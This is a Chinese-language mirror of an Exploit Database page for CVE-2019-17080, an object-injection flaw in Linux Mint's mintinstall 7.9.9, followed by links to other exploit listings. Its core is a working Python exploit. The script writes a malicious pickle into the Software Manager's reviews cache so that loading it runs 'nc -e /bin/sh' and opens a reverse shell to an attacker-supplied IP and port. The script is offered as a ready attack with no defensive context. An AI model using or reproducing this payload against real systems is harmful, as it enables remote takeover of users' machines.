mintinstall 7.9.9 – Code Execution

Exploit Database
20 阅读

作者： İbrahim Hakan Şeker

日期： 2019-10-03
类别：
- webapps
平台：
- linux
来源：https://www.exploit-db.com/exploits/47457/

# Exploit Title: mintinstall (aka Software Manager) object injection
# Date: 10/02/2019
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080


import os
import sys
def shellCode(payload):
with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
wb.write(payload)
print("[+] Start mintinstall")
if __name__=="__main__":
shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
else:
print("[!] exploit.py [IP] [PORT]")

last Exploits
mintinstall 7.9.9 – Code Execution的更多信息

Nova CMS – ‘/includes/function/usertpl.php?conf[blockfile]’ Remote File Inclusion：
MiniCMS 1.10 – ‘content box’ Stored XSS：
Photo WiFi Transfer 1.01 – Directory Traversal：
Joomla! Component Multi-Venue Restaurant Menu Manager 1.5.2 – SQL Injection：
ASPMass Shopping Cart – Arbitrary File Upload / Cross-Site Request Forgery：
Direct News 4.10.2 – Multiple Remote File Inclusions：
SonicWall SMA 10.2.1.0-17sv – Password Reset：
ProMan 0.1.1 – Multiple File Inclusions：